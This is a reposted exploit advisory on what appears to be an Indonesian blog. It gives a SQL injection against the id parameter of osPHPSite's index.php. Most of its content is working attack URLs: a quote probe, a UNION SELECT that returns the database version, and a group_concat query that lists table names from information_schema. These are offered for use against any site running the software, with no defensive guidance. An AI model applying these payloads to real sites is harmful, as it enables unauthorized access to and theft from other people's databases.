osPHPSite SQL Injection Vulnerability Rahman Surya Praja Selasa, 26 April 2011 No Comment




 
 # Exploit Title: osPHPSite SQL Injection Vulnerability
# Author : vir0e5
# Date : 1-12-2011
# Vendor : http://www.osphpsite.com
# Software Link: http://sourceforge.net/projects/osphpsite
# Version: ALL VERSION


[ Vulnerable File ]

~ index.php

[ Exploit ]
~ http://www.[sitename].com/index.php?id= [Sql Injection]

[ example ]

~ http://www.[sitename].com/index.php?id=24'
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,@@VERSION,3,4,5,6,7,8--
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 +from+information_schema.tables+where+table_schema =database()--
~ And More.....
by Jillur Rahman

Jillur Rahman is a Web designers. He enjoys to make blogger templates. He always try to make modern and 3D looking Templates. You can by his templates from Themeforest.

Follow him @ Twitter | Facebook | Google Plus

No Comment

Terima Kasih Sudah berkunjung!! Di Mohon Untuk Meninggalkan Komen, untuk mempererat silaturahmi.... ^_^